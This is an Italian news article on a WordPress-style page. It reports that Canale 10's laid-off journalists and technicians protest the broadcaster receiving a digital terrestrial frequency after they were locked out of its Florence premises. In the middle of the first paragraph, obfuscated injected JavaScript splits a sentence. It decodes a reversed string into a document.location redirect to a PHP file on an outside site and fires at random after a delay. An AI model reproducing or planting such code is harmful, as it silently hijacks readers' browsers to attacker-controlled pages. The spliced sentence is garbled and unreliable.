Canale 10 non ha più giornalisti, ma il Governo la premia con la frequenza digitale

image_pdfimage_print

Alla luce delle graduatorie appena pubblicate per l’assegnazione delle frequenze del digitale terrestre, i lavoratori dell’emittente televisiva Canale 10 non possono che prendere tristemente atto che la televisione per la quale lavoravano è risultata fra le prime diciotto, quindi operatore di rete e al numero 12 del telecom (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando.

Amareggia il fatto che Canale 10 sia ormai priva dei propri dipendenti da mesi ormai e che, di fatto, sia al momento un contenitore privo di informazione. Ma soprattutto, è priva di coloro che ogni giorno, attraverso la loro professionalità, hanno permesso di fatto che oggi la storica emittente toscana sia fra le realtà più “di spicco” e di “prestigio” nel futuro panorama della televisione digitale terrestre. I lavoratori non faranno parte di questo futuro né saranno i protagonisti, come invece dovrebbero essere, di un proseguimento del pluralismo informativo che il nuovo sistema dovrebbe garantire.

I dipendenti, giornalisti e personale tecnico, recentemente, sono stati persino allontanati dalla sede di via Marchetti 9 rosso attraverso il cambio della serratura, dopo aver passato mesi difficilissimi durante i quali hanno tentato di far sopravvivere in ogni modo possibile Canale 10, anche attraverso una costante informazione alle istituzioni sulla realtà drammatica che erano costretti a vivere. Canale 10 sarà una televisione in onda nel nuovo sistema digitale terrestre. Ma sarà priva di quello che davvero avrebbe dovuto essere come da sempre era stata: i lavoratori che ne permettevano la vita stessa.

I dipendenti di Canale 10 (fonte Associazione Stampa Toscana)

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *